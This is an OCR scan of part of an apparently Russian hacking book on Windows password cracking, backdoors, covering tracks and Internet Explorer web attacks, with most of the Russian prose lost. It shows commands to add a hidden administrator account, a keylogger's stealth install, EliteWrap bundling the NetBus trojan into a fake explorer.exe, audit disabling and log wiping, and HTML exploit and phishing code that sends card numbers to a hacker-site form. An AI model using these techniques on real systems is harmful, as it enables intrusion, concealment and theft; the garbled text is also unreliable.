To clipboard
Cached passwords:
Puc. 5.17. 007 !

.pwl , , .pwl. Pwltool , . Brute force
( ), .
Password length: From ... ... ( : ... ...)
, ,
. Charset
5.
75
String ( ). SearchPassword ( )
,
(. 5.18).
sword searching
E:\WINDOWS\ALEX.PWL
Number of cached passwords: 0
AutoSave every 10 minutes
BDHHI
Current speed: 0
Total variants: 1 679616
si Searching I Time left.
Variants found: 0
liJ-iin-.
Vli' lMii-J
Puc. 5.18.
, , . 5.17,
.
SmartForce ( ) Repwl (. 5.15) -
,
. , , , ,
, sdyicorljn. , ,
...
, , Dictionary () ,
. - ,
, , . , , , , , ,
.. - .
Repwl ,
.
Client/Server (/), .
Pwltool pwlclnt, Repwl.
, .
- ,
Adv (). Adv () Advanced features ( ),
. 5.19, .
76
*'!
1 ^ Advanced features
liSli3|B' ip sf'I5e^'"T''-5lfdl
Variator| BAS info | Shared Res.. | Mail | PSIorage [ Other | More... |

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Outlook Express accounts' list
| Close
POP3 Server Name: 'sword-2000.sword.net1

POP3 User Name: 'petia'
POPS Password: Not implemented in demo version
Real User Name: 'Petia'
E-mail address: 'petia@sword-2000.sword.net'
SMTP Server: 'sword-2000.sword.net'
SMTP User Name: 'petia'
SMTP Password: Not implemented in demo version
PStorage List Outlook Express resources
Useforeiqnregistryfiles
'
. 5.19. Repwl

Advanced features ( ) . 5.19,
Pwltool ,
( Mail), Windows (
PStorage), ( RAS Info),
( Other),
.
, , ,
Windows 9x/Me.
- , Windows 2000/XP , , .
!

, BIOS,
. , . , ,
. , - , , , , ( ), , ,
.
5.
77_
- ,
,
.
Windows 2000/XP
. Windows 9x/Me, -
, PGP
Desktop Security, .
Windows 9x/Me ,
.
, , , - .
.

.
, , - , , . , , Pwltool.
,
,
, (. 1 ). , .
, , , , , ,
,
.

, - , .
, ,
. : , . , ,
,
?
k
, - , , . - ,
, - , , . , , , - ,
, [2].
6.
79^
, - . ,
, ,
? , ,
- , , ,
, .
( Hoover - , ,
, ), ,
.
Windows , , ..
Windows, , Windows,
, FINDSTR
Windows 2000/XP.
, , [3,4] Fondstone Inc., ,
,
-
.

.
,
, , , password, login credit card .
Windows , , ,
FINDSTR, , Windows.
[buck FINDSTR
FINDSTR ,
FINDSTR /?. FINDSTR.
FINDSTR [IB] [/] [/L] [/R] [15] [/I] [/X] [/V] [/N] [/M] [/0] [IP] [/:] [/:]
[/:] [/0:_] [/:] [] [[:][]_[...]]
. FNDSTR /? , :
80
/L
/R
/S
/1
, .
/X
, .
/V
,
.
/N
, ,
/:
- .
/:
/:
/0:__
(
).
[:][]_
FINDSTR.
password :
FINDSTR/S "password" *.txt
, ,
password, :
6.
81
FINDSTR /S "password " *.txt

, , password.
, ,
:
FINDSTR/5/:" " *.txt
, /: .
FINDSTR ,
Windows, . , , [3].
flouck cmpok 6 BinText

BinText foundstone_tools
Foundstone Inc. (http://www.foundstone.com) , - , DLL,
. . 6.1 BinText, - Search (), Filter () Help ().
BinText, :
Search | Filter [ Help
File to scan
|C:\Ti st\testdoc
0 Advanced yiew
| j Browse 1
Time taken : 0.000 sees Text size: 444 bytes (0.43K)
File pos [ Mem pos | ID (Text

000023.. 000023... 0
2}/f
4000024. 000024... 0
(/(:
000026 000026... 0
Administrator
000027.. 00002700 0
A 00002?.. 00002730 0
Normaldot
00002744
0
Administrator
000027..
A 000027.. 00002768 0
Microsoft Word 9.0
Mech&Oralo
A 000036.. 000036... 0
this is every big secret
A 00003?.. 00003700 0
A D0004E. 00004E... 0
MSWordDoc
Word.Document.8
A 00004E. 00004E... 0
Root Entry
U 000048.. 00004801 0
U 000048.. 00004880 0
ITable
U 000043.. 00004SOO 0
Word Document
Ready
ANSI: 46
fio
1
Rsrc: 0
. 6.1. BinText

> Browse () .
82
> Go! (). BinText 3.00

.
Advanced view ( ) (. 6.1).
. 6.1 File pos ( ) ' . Mem pos ( ) , Windows.
ID , . 0 , .
BinText
, Windows , . , . 6.1
Test.doc, MS Word. , , Sword, .
, - ,
, ? ,
. . , .
, , .
. 6.2 BinText, , WinRAR .
/ BinText 3 00
Search | Filler
[ Help
File to scan
|c:\Test\tesl.rar
| | Browse |
13 Advanced yjew
File pos
AiOiraoun
000000... 000000...
000002... 000002...
000002... 000002...
A 000004... 000004...
4000004... 000004...
000004... 000004...
^000005... 00000561
4000006... 000006...
4000007... 000007...
4000006... 00000835
400000A... OOOOOA...
4 OOOOOA... OOOOOA...
400000C... OOOOOC...
Ready
Time token : 0 01 0 sees Text size: 21 A bytes (0 21 K)
| Memjxjs [ ID
(:
Go
3
)
3
3
3
D
3
3
0
0
0
3
0
0
1 1 ANSI: 39
| Text
testdoc
U(C/vOx6
BHpl
J1IKLJ
ncNJ3
)g>RR
D/;Yc
S-{~n
;-k#
olEo.
OVrCzA
v?3J4
f.xwd
B2kJ[
|| Uni: 0
j^
p
1 1 Rsrc: 0
||
II Find | | Save |
Puc. 6.2.
6.
83
, ,
- Test.doc. , Encrypt file names ( ),
. 6.3.
Archiving with password
Enter password
Reenter password for verification
Q Show password
0 Encrypt file names
. 6.. !
, - Test.doc , ,
? BinText

(. . 6.2) Find (). ,
Filter () ,
(. 6.4).
BinText 3 0 0
Search I Filter
I Help
0a
DCR
DLF
0 ' (apostrophe)
0 Space
0Tab
01
0"
0#
0$
0%
0(
0)
0/
00-9
E]
0:
0-
0 +
0 . (comma)
0 - (minus)
0 . (period)
0<
0 A-Z
01
D"
0 - 0 (underscore)
0>
' (backtick)
0 ?
0 a-z
0
0{
Include th<>se characters too
STAGE 2:
Ctear
1 Restore defaults
^STAGES: Essentials -
String size
Min text length
[5
Maxtextlength
[4
1 or more repeated characters
Q Discard strings with
01
0}
0 ~ (tilde)
AAACEEEIrbOOUUOr
D AEIOUB
Q aeiou
0 [
0\
MUST contain these
Puc. 6.4.
Filter () . 6.4 , .
84
Stage 1 - Characters included in the definition of a string ( 1 , )

, .
Stage 2 - String size ( 2 - ) .
Stage 3 - Essentials ( 3 - )
MUST contain these ( )
.
, , . , , , , MS Office - ..
BinText , , W2RK srvinfo.exe
, regdmp.exe,
Windows 2000/XP.
HKEY_LOCALMACHUNE\
SECURITY\POLICY\SECRETS,
Windows, Windows
[4]. Isadump2.exe (http://razor.bindview.com),
LSA Windows,
Isadump2.exe .
, - . , - - MS Office
W i n R A R ?
, .
k

Windows , , .
MS Office
(http://www.elcomsoft.com), - OfficePassword 3.5. ,
, *******. Revelation
SnadBoy (http://www.snadboy.com).
6.
85

, ,
AZPR , Passware Kit,
http://www.lostpassword.com.
Windows - , /, , , Window - Off ice Password
.
flakem OfficePassw/ord 3.5

OfficePassword 3.5
Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP
VBA, MS Office.
OfficePassword 3.5

.

Word
password.doc,
- ?
, Windows,
password.doc, (. 6.5).
- ,
OfficePassword 3.5 :
> * * OfficePassword (Start * Programs * OfficePassword).
OfficePassword
(. . 6.6).
Password
Enter password to open file
C:\test\password.doc
II
OK
Cancel
Puc. 6.5.
Word
I OfficePasswoid 'DEMO'
File
Tools
Options
Help
Select document
You can also drag-and-diop files from Internet Explorer onto this
window.
> (c) 1998-2001 Vitas Ramanchauskas, LaslBil Software <
http://laslbit.conn
"""DEMO Version1""
Register to upgrade to a full-functional version! |
Puc. 6.6.
OfficePassword
> Select document ( )

Windows MS Office.
86
, Word . ,
MS Word . ,
- OfficePassword 3- .
- , .
> , Select recovery
mode ( ), . 6.7.
(Select recovery mode
Document path: C:\test\passworddoc (Word)
Version
: Word 8.0+
Internal version: 193
v/ord language : Russian (041 9)
Encryption type : Strong
Text size
: 537
-:
rreview
Automatic
OfficePassword automatically selects most suitable rec svery options. Recovery may take a
lot of time (up to several months in case of a long passv ord). About 80% ol all passwords
could be recovered within 48 hours. Use guaranteed re covery otherwise.
User-defined
Adjust settings to optimize search for specific case. (Th s option is for advanced users only.)
Guaranteed recovery
Success is guaranteed! Important: please read the doc jrnentation. Additional fee may apply.
I Click here to learn more
Cancel
| Display help info
Next
Puc. 6.7.
> Select recovery mode ( )
:
Automatic ( ), , Next (), , .
User-defined ( ),
. .
6.
87
Guaranteed recovery ( ), , , ,
.

, , 24-28
, . , , .
> Next ().
, ,
(. 6.8).
OfficePasswoid 'DEMO*
Password found:
'007' (without quotes]
The password has been copied onto the clipboard
Would you like to open the document now?
Yes
No
Puc. 6.8. !
OfficePassword 3.5 ,
, . -. , .
, - ,
.
, , - ,
.
cmpokou ******,
, - ,
, (, ), , ******_
, , , . - , , ,
. ,
.
88
,
, . , , NetBus
( ,
14). . 6.9
Revelation SnadBoy (http://www.snadboy.com) NetBus NetBus.
1
SnadBoy's Revelation
'Circled +' Cursor

Drag to reveal password
| Check For Update |1
About
Exit
I Copy to clipboard
Text of Window Under 'Circled +' Cursor (if available)
007
Status
Revelation active.
Length of available text: 3
Reposition Revelation out of the way when dragging 'circled +'

When minimized, put in System Tray
Destination
111
Jl SWORD-2000
Change Host
-Host information1
Q Always on top
Hide 'How to' instructions
How to
1 ) Left click and drag (while holding down the left mouse button) the 'circled V
2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field
under the cursor will be displayed in the Text of Window...' box.
3) Release the left mouse button when you have revealed the text you desire.
NOTE - If the field contains text hidden by asterisks (or some other character), the actual text will be
shown. In some cases the text may actually be asterisks.
NOTE - Not all of the fields that the cursor passes over will have text that can be revealed. Check
the status light for availability of text.
Bright green = text available (See 'Length of text:' in Status area)
Bright red = no text available
OK
Cancel
Puc. 6.9. NetBus Sword-2000

!
Revelation .
. 'Circled+'Cursor ('+')
SnadBoy's Revelation ( . 6.9
Password ()). Revelation,
Test of Window Under Circles and Cursor (if available) (
( )) (
). . 6.9, 007
NetBus Sword-2000,
( ).

6.
89
( NetBus) , 15
.

- , - , -
, , - .
: .
, 7.
-
, ,
, . , , ,
. - ,
backdoor - , ,
.

- , , , , .
MS-DOS: NET USER < > <> /ADD,
,
NET LOCALGROUP < > < > /ADD,
. . 6.10 .
C:\>net user NewUser 007 /add
|The commend completed successfully.

C:\>net localgroup Administrators NewUser /add
|The commend completed successfully.
Puc. 6.10.
NewUser
90
NewUser
, , .
,
,
.
ABmosazpyska
- , . Windows - Startup
Document and Settings ( ) , .
Startup, All users, .
,
, . , (), .
, , 14 15
, .
IKS (Invisible KeyLogger
Stealth - ), - http://www.amecisco.com.

- ,
. - , , .
IKS -
http://www.amecisco.com, Invisible
KeyLogger 97 8 10 ,
.
Windows NT/2000/XP, ,
, [ |+|[ Ait |+[[Deiete)
IKS
Windows NT/2000/XP. , IKS
,
.
6.
91
IKS .
Web- iks2k20d.exe , . 6.11.
Si IKS (or Windows 2000 Installation
D Standard Install | p Slsalth Install | D Uninstall j
It's recommended (hot you use Standard Install if this is your first time in using IKS. Just
accept the defaults and click on "Install Now" button. Or you can click on "Read readme.M"
to get familiar with the concept of IKS first.
During a standard installation. 0 program ditectoty will be created; program files will be
placed in the directory. An icon to the log file viewer will be placed on the desktop. No file
renaming (stealth features) will take place.
Install Directory;
|C:\Program Files\iks
You need to have administrator rights on this system tor it to install successfully.
If you want to uninstell in the future, just run this program (iksinstall.exe) again, click on the
"Uninstail" tab, then "Uninstall Now" to automatically uninstall the standard installation.
. 6.11. IKS
Install Now ( ) -
. IKS
. , IKS , iks.sys,
- ( Diilvinw - Binary Log Translator for IKS
- settings
.
Use Notepad
0 Fitter Out Arrow Keys
Translate to Text Only
, D Filter Out Ctrl and Alt Keys

Filter Out F1 to F1 2 Keys
D Clear Binary Log Upon Exit
dataview.exe, Filter Out All Other Function Keys
1 El Clear Text Log Upon Exit
. 6.12.
Go! ()
, . . 6.12
,
,
.
Import Binary Log From:

C:\WNNT\iks.dal
Browse...
Save Text Log To:

C:\DOCtJME~1\ADMINri.OOO\LOCALS
I Browse...
Go!
Puc. 6.12.

92
, IKS , . iks.sys KOpeHb_CMCTeMbi/system32/drivers,

( Regedt32 . 6.13).
Registry Editor - (HKEY LOCAL MACHINE on Local Machine]
Registry Edit Tree View Security Options Window
f*"l Gernuwe
-SGpc
-(]i8(M2prl
-SI97DRIVER
Help
_
StaT"RE"GJDWORD"OxF"
Type : REGJDWORD : 0x1
-a IAS
-B ICQ Groupware Sd
-SIISADMIN
-&IMAP4D32
- IMonitor
-C] inetaccs
-t*H Inetlnfo
-Sini910u
Ôlnport
. 6.13. Windows

(,
The Cleaner, ).
IKS, Stealth Install
( ) (. 6.11)
- , calc.sys,
(, -
- ).
IKS
. 007 Stealth
Monitor, Web-, , ,
. -
Windows,
- , , notepad.exe.
Sanyck
, -
Windows.
,
, , ,
. , 14 15.
6.
93
Ckpbimue
,
.
, elitewrap.exe
(http://www.holodeck.f9.co.uk/elitewrap), .
,
.
Windows
, elitewrap.exe, a
, .. ,
.
. , ,
calc.exe NBSvr.exe - NetBus.
C:\>elitewrap
eLiTeWrap 1.04 - () Tom "eLite" Mclntyre
tom@holodeck.f9.co.uk
http://www.holodeck.f9.co.uk/elitewrap
Stub size: 7712 bytes
Enter name of output file: explorer.exe
Perform CRC-32 checking? [y/n]:y
Operations:
1 - Pack only
2 - Pack and execute, visible, asynchronously
3 - Pack and execute, hidden, asynchronously
4 - Pack and execute, visible, synchronously
5 - Pack and execute, hidden, synchronously
6 - Execute only, visible, asynchronously
7 - Execute only, hidden, asynchronously
8 - Execute only, visible, synchronously
9 - Execute only, hidden, synchronously
Enter package file #1: calc.exe

Enter operation: 2
Enter command line: calc
Enter package file #2: nbsvr.exe
94
Enter operation: 3
Enter command line: nbsvr
Enter package file #3:
All done :)
explorer.exe. Windows 2000
explorer.exe, calc.exe
NetBus. , , , ,
NetBus .
, elitewrap.exe , ,
, .
EliteWrap ,

.
, ,
- ,
, ,
. ,
[3], , , - .
- .
.

? ,
, , - . , . ,
, .
, , ,
.
7.
Cokpbimue
- , ,
,
. , , , , , - , , ,
. , ,
- , , , .
, -
. 1 ,
50%
, - , , .

, ,
,
. , ,- , , . ,
( ).

, - ( ).
,

. , - , , , .
.
96
acnekma
, , ,
. , , , -
. , privacy - . ,
, , , ,
, ,
.
,
[10], (, )
, - ,
- privacy. ,
, , ,
, , - ,
. .
, , ,
,
, . , . .
-, . ,
, .
, ,
, - ,
.
-, .

. , Web-
, Web, .
, , ,
7.
97
(, ).

, , - , , - . ,
? , , . :
, .
, Web-.
, -
.
,
.
Windows,
(Explorer) , .
,
Windows.
,
MS Office.
, , ,
.
? , .
Fu6kue u gucku
. ,
, (Explorer) , . ,
(Delete) Windows , , .
Windows , , , , , MS Office.
, , (Show hidden files and folders)
(Folder Options) Windows. * (Tools * Folder Options) (. 7.1).
4-1687
98
| | {
- .

:
0 " "

|^|
()
|

-
0

,
. 7.1.
- Word
(Delete) Windows ,
. . 7.2,
, Word,
, ,
.
^3
:- .4^)
&
PGP
I Security
Database
4
131
^ 3,5 (;)
(:)
(3 SJ (:)
3PGP
D Security

^~$
gl~WFU-OD02.lmp
El~WRL0004.tmp
gl~WRL1120.tmp
S~WRL19B2.tmp
gl~WRL3531.tmp
il~WRL4024.tmp
: 10 ( |||350
Puc. 7.2. ,

7.
99
, - ., .WBK, , -$. ,
, , Windows, ,
,
Windows. , - , , . ?
, MS Office, ,
, , Norton Utilities.

Cleaner Disk Security
(http://www.theabsolute.net/sware/index.htmltfClndisk).
nanok
, , ,
. , .

, ,
.
- , , . ( 100%)
.
/
. 7.3 Clean Disk Security 5.01

(http://www.theabsolute.net/sware/index.htmltfClndisk),
, ( ).
Clean Disk Security 5.01
Erase fully ( ).
-
, , ( FAT NTFS).
,
, . Windows, Windows, Temp
( , , ) .
-,
, ,
(cookie). , (. 7.3).
100
. 7.. Clean Disk Security 5.01

. 7.3, :
Simple () 6 ,
.
; 1 .
NIS - 7 (.. ) .
Gutmann - 35
(.. ).
(Peter Gutmann) . .
, ( ).
Test mode ( ) - #10
ASCII.
. , Clean Disk Security 5.01
,
,
.
, [10]. -
, : (UPS);
7.
101
. , ,
.
,
.
Onucmka
, , .
, ,
. -, ,
, .
, . , , , Norton Utilities, , / , .
, , [10].
( ) - , ,
regedt32.

. , ,
NTFS.

, ,
, -
. , - - Web- .
, , .
.
, ,
.
, , .
102
. ,
.

, . ().
, ,
, .
( Web-,
, , ),
, , ,
. , , .
(., [5],
[10], -
, , ). , -,
. , , , .
, -.
-, , .
. , . , , ,
. -,
- ,
!
- , ,
, .
,
- ,
!!!
7.
103
Web- ,
HTML- Web-.
Web- , , Web-,
.
,
, Web-
http://www.privacy.net/analyze, , Web- .
. 7.4,
, Web-,
IP- .
'3 Analyze Your Internet Privacy - Microsoft Internet Explorer
aaa
^ - " < <3 | Si (^

- http://www.privacy.net/analyze/
Your Browser Type and Operating System:
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
All information sent by your web browser when requesting this web page:
Accept: V* Accept-Language: ru Connection: keep-alive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie:
Date=1/30/2002; Privacy.net=Privacy+Analysis Via: 1.1 cea15, 1.1
proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLES) X-Forwarded-For: 212.9.232.151,
212.9.224.89 Cache-Control: max-age=259200
. 7.4. Web-

, ( )
Whols,
1,
.
, - , IP- . Web-
104
Web- , IP- -
...
, , Web-, ( anonymizer -
). , Web-,
,
. , ,
http://www.anonymizer.com. (. 7.5).
"1 Anonymizar cam Online Privacy Services - Microsoft Internet Explorer
^ * " < <3 | 3t | ^"
Anonymi/er.eomSIGNUP
PRODUCTS & SERVICES
LEARft [About Privacy --
BECOME AN AFFILIATE
NEWS
hj SHOP: | Services/Products
httpi/
i-ojjf
Spy Cop l
i.i. \..f
Prevent backing by Web
sites, hacken and others. Go
* Shieids vour IP address ''.
. 7.5. Web-
Go.

- ,
- FTP-, , , . , , ,
Web-, ,
.
( ), .
npokcu-cepBepbi
Web -, - (Proxy server)
(. 7.6).
7.
105
IP-key

,
.

0 -
:
| www.anonymize : I8080
I , . .
:
:
. 7.6. -
- , , , .. Web-
-,
.
- .
- HTTP, FTP-,
Web-,
FTP.
- , .
- .
- . , ,
, Web-, , Yahoo.
proxy+server+configuration+Explorer,
Web-, ,
-.
- ,
, .
106
Cokpbimue amaku
, , , ,
, , , .
, , , 6 IKS. , , NetBus
(http://www.netBus.org).
, , ,
, , .
:
- , (
- ).
- , -,
.
, , . , Back Orifice 2000
31337 , , 31336, ,
, .
,
Windows NT/2000/XP.
, auditpol
W2RK, - , ,
elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
(Event Viewer) Windows 2000/XP.
, ,
(Hidden).

Windows, .
, .
,
, , explorer.exe,
7.
107
Windows
Windows.

, EliteWrap, 6.
( Rootkit ). ,
, .

.
Tripwire (http://www.tripwiresecurity.com),
, Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].

, ,
, -
, .
, / .

Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, . :
C:\Auditpobauditpol \\ComputerName /disable
Running...
Audit information changed successfully on \\ComputerName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled
System
Logon
Object Access
= No
= No
= No
108
Privilege Use
Process Tracking
No
= Success and Failure
Policy Change
a No
Account Management
a NO
Directory Service Access
= No
Account Logon
No
//ComputerName - , /disable
. auditpol.exe - , , ,
, ( auditpol /? ).
Omicmka

Windows 2000/XP :
> (Start)
.* (Settings Control Panel).
>- (Control Panel)
(Administrative Tools).
> (Event Viewer).
Event Viewer ( ) (. 7.7).
File
Action
View
Application
\ Security
|HJ System
Help
Event Viewei (Local)

t Type i Description
Log
Application Eiroi Records
L0g
Open Log File...

Save Log File Ai...
New Log View
I Size
512...
ttlll
512...
delete all records in the log
Puc. 7.7. Windows
7.
109
> (Security Log);

.
> Clear all Events ( ). , . 7.8,
.
Event Viewer
Do you want to save "Security" before clearing it?
Yes
Ho
Cancel
Puc: 7.8.
> (No), . .
,
! ,
-
. , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
, , Windows NT 4,
Windows 2000. .
C:\els004>eisave -s \\ComputerName -
-s , -
. , . elsave /? ,
.
, elsave.exe
. elsave.exe Windows ( (Start), AT MS-DOS). System, .
Ckpbimue ,

, , . - -
110
, , .
.
Cokpbimue
,

(. 7.9).
nc.exe Properties
General | Compatibility f Security j Summary [
Inc.exe
Type of file:
Application
Description:
nc
Location:
C:\testVietcat
Size:
58.0 KB (59.392 bytes)
Size on disk:
60.0 KB (61,440 bytes)
Created:
Sunday, Decembej 22, 2002,1:32:09 PM
Modified:
Saturday, January 03,1998,1:37:34 PM
Accessed:
Today, Decembei 30.2002,12:05:10 PM
Attributes:
Read-only
OK
0 Hidden
Cancel
| Advanced..
Apply
Puc. 7.9. Windows

, , Windows
.
Ckpbimue
,
, Windows. ,
. Windows 2000/XP Documents and Settings\User\Start Menu\Programs\Startup
. , -
7.
111
-
, , .
, Windows
, ,
, , The Cleaner
(http://www.moosoft.com).
, EliteWrap 6.
- .
Pymkumbi
, - UNIX [3]. , , ,
,
. , ,
, .
Windows NT/2000/XP
, ROOTKIT (http://www.rootkit.com)
. , , ..
NTKap, , ACL (,
4), . ,
, , Windows NT/2000/XP
. ROOTKIT COM

. , ....
112
-
( , - ).
, , . , , ,

, .
- ! 50%
( - !)
- !
- , , [9]. , , Norton Personal Firewall, PGP Desktop Security .
, ,
, .
3.
XakuHz
-
8.
XakuHg 1/
, ,
, ,
. , ,
,
, , .
, 90- , .
, , .
4 ,
, ,
.
, ,
, TCP/IP.
- ,
.
- , , .
,
.
, , ,
(, ).
, . ,
114
, , , Word ..,
, , ,
.
WWW (World Wide Web - ), Web (). Web - , Web . - 1961 , Web 1992
.
, , . Web - Web ,
, Web.
Web .
Web, Web URL (Uniform
Resource Locator - ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol - ).
, Web,
HTML (Hyper Text Markup Language -
).
,
: , , ,
- HTML CGI HTTP. ,
.
Web , , Web, , - , , - 1 Web
.
Web , , Web - HTML Web,
( browser, , -
8. Web
115
, ),
Web Web-.
kog HTML
HTML - Web,
Web,
, , , , , , , , .
, HTML , Web, ,
Internet Explorer (IE) Netscape Navigator (NN).
: Web - , HTML Web , , ,
HTML, , - Web? -
HTML? . ( )
, , Web-.

, DoS , Web . , ,
Web,
, .
(),
JavaScript MainPage.html , HTML
8.1.
8.1.
HTML Web-
<>
<SCRIPT LANGUAGES"JavaScript">
generation^);
function generation() {
var d=0;
while (true) {
a. = new Date;
d = a.getMilliseconds();
window, open ("MainPage.html11, d, "width=250, height=250" );
116
}
</SCRIPT>
</HTML>
IE 5 IE 6
.

HTML, , . Windows 2000/XP
IE 5 IE 6 HTML,
.

- . , 8.2
... X (
).
8.2.
HTML Web-
<>
<SCRIPT language=JAVASCRIPT>
var p = external.... ;
</SCRIPT>
</HTML>
HTML 8.2 IE 5
var p 8.2.

( [3], [10]). , ,
-
HTML .
Sanyck
[3] HTML,
<OBJECT> CLSID (
). 8.3.
HTML, .
8. Web
117
8.3. HTML
<HTML>
DBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000
1
CODEBASE=':\windows\system32\calc.exe >
</OBJECT>
</HTML>
8.3 IE 6 ,
. 8.1.
C:\Documenls and SellingiSAIexSMy DocuroenliW/oik D... |-|||
File
Edit
View
Favorites
Tools
Help
fTlBlfxl
Calculator
Edit
View
Help
Backspace
[ MC
| MR
MS
M*
Opening page
i s
/ jfîT
W-
| 1/x
t-
|| My Computei
, 8.1. HTML

C:\Windows\system32\calc.exe, , .
Web- ,
JavaScript, HTML- Web-, . ,
IFRAME, Web- .
8.4 HTML, ,
C:\security.txt.
118
8.4.
Web-
<HTML>
<BODY>
C:\security.txt <BR>
<IFRAME id=Il></IFRAME>
<SCRIPT event=NavigateComplete2(b) for=Il>
alert(" :
\n"+b.document.body.innerText);
</SCRIPT>
<SCRIPT>
II.navigate("file://c:/Security.txt");
setTimeout('II.navigate("file://C:/Security.txt")',1000);
</SCRIPT>
</BODY>
</HTML>
8.4 IE 5 IE 6
, . 8.2.
"* C:\Documenls and Seltings\Alcx\My DocumenUWoik D... HOD!
File
Edit
View
Favoritet
Tools
Back -
Help
Search
C:\security.txt

I Done
|| jj My Computer
. 8.2. Web-
. 8.2, security.txt -
- Web-. , , - , JavaScript
.
Web- NavigateComplete2,
[3].
8. Web
119

ActiveX ,
HTML- Web- .
Web- , ActiveX, . , Web-,
ActiveX, ActiveX
, .
ActiveX Microsoft - ActiveX ,
ActiveX
(, Verisign Corporation). Web-
, ActiveX - ,
ActiveX.
, ,
, ,
(
http://www.guninski.com), .
- , ActiveX , .
ActiveX ,
http://www.guninski.com. ,
- .
ActiveX
Windows
ActiveX. Web, Web-,
<OBJECT> ActiveX, Windows ActiveX ActiveX, Web.
, ,
ActiveX. - .
ActiveX Windows safe
for scripting ( ),
120
Web. , ActiveX,
,
(Georgi Guninski) . ,
ActiveX, , Scriptlet Eyedog, ,
IE 4.
http://www.guninski.com HTML- ( - , ), Scriptlet , Eyedog
Windows . IE 4 Windows 9x.
Windows 2000/XP ActiveX, , IE 5 IE 6 [3]. , Windows 2000/XP , , , . [3],

- ActiveX
. , , , , .
8.5 HTML,
, ,
. ( HTML
, ,
http://www.guninski.com).
8.5.
<>
<SCRIPT>
alert(" : :\\secret.txt\BaM \ " )
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
x=v.eval('GetObjact(":/secret.txt", " h t m l f i l e " ) ' ) ;
setTimeout("alert(x.body.outerHTML);", 2 0 0 0 ) ;
</SCRIPT>
</HTML>
8.5 IE 6 ,
. 8.3.
8. Web
121
iQcAteitVMSScNpt.hlml - Micro.olt Inlecnel Exploiei

File
Edit
View
Favorite!
Toolt
[
jjf
Help
Back > . g] g) | /) Sea,ch
" Links "

0
Microsoft Internet Explorer

^}
[x]
<BODY><PRE>3ro
</PBE></BODY>
OK |
g| Done
||
||
||
Hi My Computer
. 8.3. security.txt
, security.txt ,
security.txt Web-,
,
. , Windows, ,
.
- .
, (cookie),
Web- Web.
kyku
- .
-
, , , ,
- ,
Web.
, - , .
, ,
, SpyNet (. 17),
Web-, .
PEACEFIRE
http://www.peacefire.org/security/iecookies
JavaScript,
,
, . 8.4.
122
"1 Internet Explorer cookies are world-readable - Microsoft Internet Ex..

File
Edit
*-Beck
View
Favorites
Tools
Help
( | CtSearch SiFavorites gJHistory
[Links'
If you have Internet Explorer for Windows, type a domain (e.g. "yahoo.com"
or "hotmail.msn.tom") in the space below, and click to view a page on
Feacefire.org that will display your cookie for that domain:
(You must click the button to submit the domain name hitting Enter will not work)
lMySite.com
Click to view cookie
Or you can go to a demonstration at the following URL, to see a list of information that
is exposed by cookies set from Amazon.com, MP3.com, and other popular sites:
http://www.securitvsoace.cQm/exploit/exploit lc.html (hosted by securitvspace.com')
A
Puc. 8.4.

.
, Web-
,
- . Javascript ,
. , , .
, Web-
http://www.peacefire.org/security/iecookies.
Javascript, Click to view cookie
( ), , ,
. , ,
,
.
flepekpecmHbie
JHTML-,
Web, Web- . Web CGI-,
Web-, .
8.6.
8.6. HTML
<HTML>
<BODY>
8. Web
123
, <
HREF="http://WWW.AnySite.com/cgi/Hacker. 1?=<81>
</81>" </>
</BODY>
</HTML>
Web-
Comment, , ,
. , , , ICQ, - ,
. Web, - .
, . ( CGI- ).
Web-caumoB
Web, , , - Web- . ,
Web- ActiveX, .
,
,
, , , , -,
- ..
- , ,
. ,
- .
- ,
- Web-,
. ,
,
.
, Web - . , Windows
Web- Microsoft NetBus.
124
Web-,
.
Web- ,
. 8.7
HTML, .
8.7. HTML
<HTML>
<HEAD>
<1> Bubliki&Baranki BCE!!!!!</TITLE>
</HEAD>
<BODY>
<SCRIPT TYPE="text/javascript">
function falsifyQ {
z=window.open("about:Internet-Mara3HHBubliki&Baranki");
z.document.openQ;
z.document.write
("<1>
BubHki&Baranki</TITLExHl>3aKa3
VirtualAir</Hl>
<FORM
ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber'
=5- =1<>
no4Tbi<BR><INPUT =11>
<><11
TYPE=textxBRxINPUT
TYPE=checkbox
]=>
VirtualAir<P>
<INPUT
TYPE=submit
=''/(>");
z.document.close();
}
</SCRIPT>
<H1 ID="header">ToBap VirtualAir</Hl>
. Bubliki&Baranki VirtualAir, ! <
HREF="javascript:var
a;"
onclick="falsify()"
onMouseOver="window.status=
'http://www.Bubliki&Baranki.com'; return true;" onMouseOut= "window.status="">
, </> Bubliki&Baranki!
</BODY>
</HTML>
8.7 IE 5 , . 8.5.
8. Web
125
| '3 RogiKopito ... !

File
Edit
View
Favorite!
Tool.
ft
Help
|/)sea,ch
VirtualAir
Bubliki&Baranki
VirtualAir,
! ,
Bubliki&Baranki! ^
4 hllpVAvww.BublilABaianki.com
> Compute!
. 8.5. Web- Rog&Kopito

http://www.Bubliki&Baranki.com -
Rog&Kopito . Web- Rog&Kopito

Bubliki&Baranki, Web- Rog&Kopito
. (, ,
.) , Web-
Bubliki&Baranki. Web-, . 8.6.
3 BublikilBaianki - Miciosof...M ' ~J
File
Edit
View
Favorites
Toolt
Help
[ C) IP Seaich
Address ] 1:111-Bubliki&Baianki--
VirtualAir

VirtualAir
Done
|| My Computel
J3
. 8.6. Web- VirtualAir

Bubliki&Baranki
126
Web- . 8.6
.
CGI- GetCardNumber,
Web-, Rog&Kopito:
<FORMACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber'METHOD=post>
-
(Address) ,
,
